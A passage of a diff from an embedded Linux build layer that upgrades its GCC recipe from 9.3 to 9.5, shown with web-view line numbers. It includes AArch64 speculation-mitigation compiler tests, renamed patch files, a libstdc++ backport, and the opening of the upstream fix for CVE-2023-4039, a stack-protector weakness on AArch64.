572diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
573new file mode 100644
574index 000000000..b1fb754c7
575--- /dev/null
576+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
577@@ -0,0 +1,40 @@
578+/* { dg-do compile } */
579+/* { dg-additional-options "-mharden-sls=blr -mbranch-protection=bti" } */
580+/*
581+ Ensure that the SLS hardening of BLR leaves no BLR instructions.
582+ Here we also check that there are no BR instructions with anything except an
583+ x16 or x17 register. This is because a `BTI c` instruction can be branched
584+ to using a BLR instruction using any register, but can only be branched to
585+ with a BR using an x16 or x17 register.
586+ */
587+typedef int (foo) (int, int);
588+typedef void (bar) (int, int);
589+struct sls_testclass {
590+ foo *x;
591+ bar *y;
592+ int left;
593+ int right;
594+};
595+
596+/* We test both RTL patterns for a call which returns a value and a call which
597+ does not. */
598+int blr_call_value (struct sls_testclass x)
599+{
600+ int retval = x.x(x.left, x.right);
601+ if (retval % 10)
602+ return 100;
603+ return 9;
604+}
605+
606+int blr_call (struct sls_testclass x)
607+{
608+ x.y(x.left, x.right);
609+ if (x.left % 10)
610+ return 100;
611+ return 9;
612+}
613+
614+/* { dg-final { scan-assembler-not {\tblr\t} } } */
615+/* { dg-final { scan-assembler-not {\tbr\tx(?!16|17)} } } */
616+/* { dg-final { scan-assembler {\tbr\tx(16|17)} } } */
617+
618diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
619new file mode 100644
620index 000000000..88baffffe
621--- /dev/null
622+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
623@@ -0,0 +1,33 @@
624+/* { dg-additional-options "-mharden-sls=blr -save-temps" } */
625+/* Ensure that the SLS hardening of BLR leaves no BLR instructions.
626+ We only test that all BLR instructions have been removed, not that the
627+ resulting code makes sense. */
628+typedef int (foo) (int, int);
629+typedef void (bar) (int, int);
630+struct sls_testclass {
631+ foo *x;
632+ bar *y;
633+ int left;
634+ int right;
635+};
636+
637+/* We test both RTL patterns for a call which returns a value and a call which
638+ does not. */
639+int blr_call_value (struct sls_testclass x)
640+{
641+ int retval = x.x(x.left, x.right);
642+ if (retval % 10)
643+ return 100;
644+ return 9;
645+}
646+
647+int blr_call (struct sls_testclass x)
648+{
649+ x.y(x.left, x.right);
650+ if (x.left % 10)
651+ return 100;
652+ return 9;
653+}
654+
655+/* { dg-final { scan-assembler-not {\tblr\t} } } */
656+/* { dg-final { scan-assembler {\tbr\tx[0-9][0-9]?} } } */
657--
6582.25.1
659
diff --git a/meta/recipes-devtools/gcc/gcc-9.3.inc b/meta/recipes-devtools/gcc/gcc-9.5.inc
index 1c8e3df51d..9bb41bbe24 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3.inc
+++ b/meta/recipes-devtools/gcc/gcc-9.5.inc
@@ -2,13 +2,13 @@ require gcc-common.inc
2 2
3# Third digit in PV should be incremented after a minor release 3# Third digit in PV should be incremented after a minor release
4 4
5PV = "9.3.0" 5PV = "9.5.0"
6 6
7# BINV should be incremented to a revision after a minor gcc release 7# BINV should be incremented to a revision after a minor gcc release
8 8
9BINV = "9.3.0" 9BINV = "9.5.0"
10 10
11FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.3:${FILE_DIRNAME}/gcc-9.3/backport:" 11FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.5:${FILE_DIRNAME}/gcc-9.5/backport:"
12 12
13DEPENDS =+ "mpfr gmp libmpc zlib flex-native" 13DEPENDS =+ "mpfr gmp libmpc zlib flex-native"
14NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native" 14NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native"
@@ -69,16 +69,14 @@ SRC_URI = "\
69 file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \ 69 file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \
70 file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \ 70 file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \
71 file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \ 71 file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \
72 file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \ 72 file://0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch \
73 file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \ 73 file://CVE-2023-4039.patch \
74 file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
75 file://0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch \
76" 74"
77S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}" 75S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
78SRC_URI[sha256sum] = "71e197867611f6054aa1119b13a0c0abac12834765fe2d81f35ac57f84f742d1" 76SRC_URI[sha256sum] = "27769f64ef1d4cd5e2be8682c0c93f9887983e6cfd1a927ce5a0a2915a95cf8f"
79# For dev release snapshotting 77# For dev release snapshotting
80#S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}" 78#S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}"
81#B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}" 79B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
82 80
83# Language Overrides 81# Language Overrides
84FORTRAN = "" 82FORTRAN = ""
@@ -123,3 +121,6 @@ EXTRA_OECONF_PATHS = "\
123 --with-sysroot=/not/exist \ 121 --with-sysroot=/not/exist \
124 --with-build-sysroot=${STAGING_DIR_TARGET} \ 122 --with-build-sysroot=${STAGING_DIR_TARGET} \
125" 123"
124
125# Is a binutils 2.26 issue, not gcc
126CVE_CHECK_WHITELIST += "CVE-2021-37322"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
index 0d9222df17..0d9222df17 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
index f427ee67c1..f427ee67c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
new file mode 100644
index 0000000000..506064bfc2
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
@@ -0,0 +1,44 @@
1From 60d966708d7cf105dccf128d2b7a38b0b2580a1a Mon Sep 17 00:00:00 2001
2From: Jonathan Wakely <jwakely@redhat.com>
3Date: Fri, 5 Nov 2021 21:42:20 +0000
4Subject: [PATCH] libstdc++: Fix inconsistent noexcept-specific for valarray
5 begin/end
6
7These declarations should be noexcept after I added it to the
8definitions in <valarray>.
9
10libstdc++-v3/ChangeLog:
11
12 * include/bits/range_access.h (begin(valarray), end(valarray)):
13 Add noexcept.
14
15(cherry picked from commit 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf)
16
17Upstream-Status: Backport [https://github.com/hkaelber/gcc/commit/2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]
18Signed-off-by: Virendra Thakur <virendrak@kpit.com>
19
20---
21 libstdc++-v3/include/bits/range_access.h | 8 ++++----
22 1 file changed, 4 insertions(+), 4 deletions(-)
23
24diff --git a/libstdc++-v3/include/bits/range_access.h b/libstdc++-v3/include/bits/range_access.h
25index 3d99ea92027..4736e75fda1 100644
26--- a/libstdc++-v3/include/bits/range_access.h
27+++ b/libstdc++-v3/include/bits/range_access.h
28@@ -101,10 +101,10 @@ _GLIBCXX_BEGIN_NAMESPACE_VERSION
29
30 template<typename _Tp> class valarray;
31 // These overloads must be declared for cbegin and cend to use them.
32- template<typename _Tp> _Tp* begin(valarray<_Tp>&);
33- template<typename _Tp> const _Tp* begin(const valarray<_Tp>&);
34- template<typename _Tp> _Tp* end(valarray<_Tp>&);
35- template<typename _Tp> const _Tp* end(const valarray<_Tp>&);
36+ template<typename _Tp> _Tp* begin(valarray<_Tp>&) noexcept;
37+ template<typename _Tp> const _Tp* begin(const valarray<_Tp>&) noexcept;
38+ template<typename _Tp> _Tp* end(valarray<_Tp>&) noexcept;
39+ template<typename _Tp> const _Tp* end(const valarray<_Tp>&) noexcept;
40
41 /**
42 * @brief Return an iterator pointing to the first element of
43--
442.25.1 \ No newline at end of file
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
index 23ec5bce03..23ec5bce03 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
index 17ec8986c1..17ec8986c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
index 3c28aeac63..3c28aeac63 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
index 906f3a7317..906f3a7317 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
index 68a876cb95..68a876cb95 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
index 6acd2b0cf9..6acd2b0cf9 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
index 5a9e527606..5a9e527606 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
index a8103b951e..a8103b951e 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
index d9d563d0f7..d9d563d0f7 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
index f0b79ee145..f0b79ee145 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
index 455858354f..455858354f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
index 2953859238..2953859238 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
index d4445244e2..d4445244e2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
index 6f0833ccda..6f0833ccda 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
index 96da013bf2..96da013bf2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
index 2385099c25..2385099c25 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
index e0129d1f96..e0129d1f96 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
index 1d2182140f..1d2182140f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
index e363c7d445..e363c7d445 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
index 846c0de5e8..846c0de5e8 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
index 102d6fc742..102d6fc742 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
index 443e0a2ca6..443e0a2ca6 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
index 59ac97eaed..59ac97eaed 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
index abfa7516da..abfa7516da 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
index ae8acc7f13..ae8acc7f13 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
index 52a5d97aef..52a5d97aef 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
index bfa7e19dd0..bfa7e19dd0 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
index f8e8c07f62..f8e8c07f62 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
index 60a29fc94d..60a29fc94d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
index 6f048dab82..6f048dab82 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
index f080b0596f..f080b0596f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
index 3b7ccb3e3d..3b7ccb3e3d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
index 5e199fbcfd..5e199fbcfd 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
index 825e070aa3..825e070aa3 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
index f268a4eb58..f268a4eb58 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
index a79fc03d15..a79fc03d15 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
index b69114d1e5..b69114d1e5 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
new file mode 100644
index 0000000000..56d229066f
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
@@ -0,0 +1,1506 @@
1From: Richard Sandiford <richard.sandiford@arm.com>
2Subject: [PATCH 00/19] aarch64: Fix -fstack-protector issue
3Date: Tue, 12 Sep 2023 16:25:10 +0100
4
5This series of patches fixes deficiencies in GCC's -fstack-protector
6implementation for AArch64 when using dynamically allocated stack space.
7This is CVE-2023-4039. See:
8
9https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64
10https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf
11
12for more details.
13
14The fix is to put the saved registers above the locals area when
15-fstack-protector is used.
16
17The series also fixes a stack-clash problem that I found while working
18on the CVE. In unpatched sources, the stack-clash problem would only
19trigger for unrealistic numbers of arguments (8K 64-bit arguments, or an
20equivalent). But it would be a more significant issue with the new
21-fstack-protector frame layout. It's therefore important that both
22problems are fixed together.
23
24Some reorganisation of the code seemed necessary to fix the problems in a
25cleanish way. The series is therefore quite long, but only a handful of
26patches should have any effect on code generation.
27
28See the individual patches for a detailed description.
29
30Tested on aarch64-linux-gnu. Pushed to trunk and to all active branches.
31I've also pushed backports to GCC 7+ to vendors/ARM/heads/CVE-2023-4039.
32
33CVE: CVE-2023-4039
34Upstream-Status: Submitted
35Signed-off-by: Ross Burton <ross.burton@arm.com>
36
37
38From 78ebdb7b12d5e258b9811bab715734454268fd0c Mon Sep 17 00:00:00 2001
39From: Richard Sandiford <richard.sandiford@arm.com>
40Date: Fri, 16 Jun 2023 17:00:51 +0100
41Subject: [PATCH 01/10] aarch64: Explicitly handle frames with no saved
42 registers
43
44If a frame has no saved registers, it can be allocated in one go.
45There is no need to treat the areas below and above the saved
46registers as separate.
47
48And if we allocate the frame in one go, it should be allocated
49as the initial_adjust rather than the final_adjust. This allows the
50frame size to grow to guard_size - guard_used_by_caller before a stack
51probe is needed. (A frame with no register saves is necessarily a
52leaf frame.)
53
54This is a no-op as thing stand, since a leaf function will have
55no outgoing arguments, and so all the frame will be above where
56the saved registers normally go.
57
58gcc/
59 * config/aarch64/aarch64.c (aarch64_layout_frame): Explicitly
60 allocate the frame in one go if there are no saved registers.
61---
62 gcc/config/aarch64/aarch64.c | 8 +++++---
63 1 file changed, 5 insertions(+), 3 deletions(-)
64
65diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
